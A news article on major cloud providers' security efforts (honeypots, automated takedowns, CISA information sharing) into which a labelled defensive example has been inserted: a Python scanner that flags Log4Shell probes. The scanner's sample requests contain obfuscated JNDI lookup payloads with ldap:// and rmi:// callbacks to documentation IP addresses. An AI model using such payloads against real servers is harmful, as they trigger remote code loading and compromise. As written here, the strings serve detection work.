Microsoft in particular has come under fire in the aftermath of an espionage operation attributed to the Chinese government that gave hackers unfettered access to the email accounts of Commerce Secretary Gina Raimondo, State Department officials and others this summer.
There was nothing that Washington could have done to stop those breaches, because the attackers had burrowed so thoroughly into Microsoft’s own corporate networks that they were able to steal a cryptographic signing key the company used to issue and validate customer login tokens. With that key and other techniques, the hackers forged tokens that let them pose as users at large customer organizations and read the inboxes of those organizations’ employees.
The Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency has tasked its Cyber Safety Review Board, which investigates the most significant hacking cases, with examining the Microsoft cloud breach. More broadly, officials have been talking about a changed security model, one of shared responsibility, with more of the weight falling on those best equipped to handle it, including security providers and the cloud companies.
In response, and in an effort to distinguish themselves from competitors on security grounds, the big three cloud computing companies are letting more of their efforts show.
“These are very large providers, providing a pretty substantial chunk of the computing environment, and they should have an obligation to deliver on security,” said Scott Crawford, research director for security at S&P Global’s 451 Research. “It’s good to see when they are, and it’s also good to see when they are called to account.”
Amazon, which has historically said little about its operations, recently demonstrated some of its techniques for The Washington Post ahead of more public explanations.
It showed how Amazon Web Services can send takedown requests to the administrators of servers hosting active malicious programs in an hour without any human involvement, down from a full day with help from human experts, analysts and engineers.
Amazon’s approach includes turning tens of thousands of virtual servers into hacking lures as soon as customers rotate off them. Known in security as honeypots, the bait machines can be configured to look like they are hosting variations of programs known to be under attack at any given time, such as those that included Log4j, an open-source Java logging library whose remote code execution flaw set off a race between hackers and defenders and helped inspire legislation.
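A honeypot of the kind described above only earns its keep if it recognizes the probe before anything is exploited and turns it into an indicator. The following is an added example, not Amazon's code and not part of the original article: a small Python scanner that a honeypot front end could run over incoming HTTP requests to spot Log4Shell (CVE-2021-44228) probes, including the nested-lookup obfuscations attackers used to slip past naive string matching, and to extract the attacker's callback host for blocking or a takedown request. The request records, the IP addresses (taken from documentation ranges) and the payload strings are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Innermost ${...} lookup: a body with no further '$', '{' or '}' inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Once obfuscation is collapsed, a probe reads ${jndi:<scheme>://<host>[:port]/...}
JNDI_ANY = re.compile(r"\$\{jndi:", re.IGNORECASE)
JNDI_DETAIL = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s:]+)", re.IGNORECASE)

# Constructed sample traffic (documentation IP ranges), not real captures.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "path": "/",
     "headers": {"User-Agent": "${jndi:ldap://203.0.113.7:1389/a}"}},
    {"src": "198.51.100.9", "path": "/",
     "headers": {"X-Api-Version": "${${lower:j}${upper:n}di:${lower:LDAP}://198.51.100.9:1389/o}"}},
    {"src": "192.0.2.33", "path": "/?q=${${::-j}${env:NOPE:-n}di:rmi://192.0.2.33:1099/x}",
     "headers": {"User-Agent": "Mozilla/5.0"}},
    {"src": "192.0.2.50", "path": "/health",
     "headers": {"User-Agent": "curl/8.0", "X-Note": "${date:yyyy}"}},
]


def _resolve(body: str) -> Optional[str]:
    """Evaluate the lookups attackers used purely for obfuscation; None means leave it alone."""
    prefix, _, rest = body.partition(":")
    prefix = prefix.lower()            # Log4j lookup names are case-insensitive
    if prefix == "jndi":
        return None                    # the lookup we are hunting for is never rewritten
    if prefix == "lower":
        return rest.lower()
    if prefix == "upper":
        return rest.upper()
    if ":-" in body:                   # ${env:NOPE:-j} or ${::-j}: undefined variable, default wins
        return body.split(":-", 1)[1]
    return None


def normalize(value: str, max_rounds: int = 16) -> str:
    """Collapse nested lookups from the inside out; bounded so crafted input cannot spin forever."""
    for _ in range(max_rounds):
        changed = False

        def substitute(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        value = INNER_LOOKUP.sub(substitute, value)
        if not changed:
            break
    return value


@dataclass(frozen=True)
class Probe:
    src: str        # who sent it
    location: str   # request field carrying the payload
    scheme: str     # ldap, rmi, dns ...
    callback: str   # attacker-controlled host the victim would connect back to
    raw: str        # payload as received, for the report


def scan_request(req: Dict) -> List[Probe]:
    """Check every attacker-controlled field of one request for a JNDI lookup."""
    fields = {"path": req["path"]}
    fields.update({f"header:{name}": value for name, value in req["headers"].items()})
    probes: List[Probe] = []
    for location, raw in fields.items():
        cleaned = normalize(raw)
        if not JNDI_ANY.search(cleaned):
            continue
        detail = JNDI_DETAIL.search(cleaned)
        scheme, host = (detail.group(1).lower(), detail.group(2)) if detail else ("?", "?")
        probes.append(Probe(req["src"], location, scheme, host, raw))
    return probes


def scan_requests(requests: List[Dict]) -> List[Probe]:
    return [probe for req in requests for probe in scan_request(req)]


def callback_hosts(requests: List[Dict]) -> List[str]:
    """Distinct callback hosts, i.e. the list an automated blocklist or takedown step would consume."""
    return sorted({probe.callback for probe in scan_requests(requests)})


if __name__ == "__main__":
    for probe in scan_requests(SAMPLE_REQUESTS):
        print(f"{probe.src} -> {probe.location}: {probe.scheme}://{probe.callback}  ({probe.raw})")
    print("callback hosts:", callback_hosts(SAMPLE_REQUESTS))
```

The normalization step is the part worth copying: a scanner that only greps for the literal string `${jndi:` misses the second and third requests entirely, while collapsing `${lower:...}`, `${upper:...}` and `${...:-default}` from the inside out, with a bounded number of rounds, recovers the real lookup without ever evaluating it.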
“We have a net footprint larger than any other cloud provider,” Amazon Chief Security Officer Steve Schmidt said in an interview. “There have been several situations where we have produced the pivotal component in a CISA advisory.” (Amazon founder and former CEO Jeff Bezos owns The Washington Post. Interim CEO Patty Stonesifer sits on Amazon’s board.)
Amazon said it helped with the Volt Typhoon attacks on critical infrastructure that Microsoft discovered and attributed to China, as well as router compromises that were blamed on the elite Russian government hacking squad Sandworm.
Like other big players, Amazon also has given information to CISA’s two-year-old Joint Cyber Defense Collaborative, which has passed on warnings to state governments and others being targeted.
Each of the providers has different visibility, which is why the collaboration center and other information sharing are important.
Beyond its cloud offerings, Microsoft has visibility into on-premises installations of its top-selling operating system and other software around the world, including the technical information reported when those programs crash, which can reveal failed attacks.
Microsoft has for years used extensive machine learning and modeling to identify threats, although, like Amazon, it charges extra for some of the enhanced protection that results from that.
Google knows the most about individual online accounts, including those used by impostors, and the physical location of hackers.
Google said it also automates takedown requests. In addition, “we proactively scan the internet for Cloud credentials customers have exposed by mistake and notify customers of leaked credentials that pose a risk to their organizations’ security,” spokesperson Melanie Lombardi said.
But Amazon is the biggest cloud provider, which means it can see more attacks as they happen.
“Amazon has unique visibility and a uniquely broad customer set, and we deeply appreciate both their efforts to use that to derive security benefits for customers and the broader community and to share that information proactively,” said Eric Goldstein, chief of the cybersecurity mission at CISA.
Still, the three big companies are going to be most effective at catching what is coming for their own customers, because all have a selection bias that comes from deploying honeypots on their own infrastructure, said Andrew Morris, chief executive of security firm GreyNoise Intelligence. His company, which tracks attacks against all manner of targets, announced this month that it would start giving away sensors for others to install in exchange for the data they collect.
“It’s absolutely a good thing that this series of techniques is effective,” Morris said of the larger companies. “The data is also going to be very incomplete.”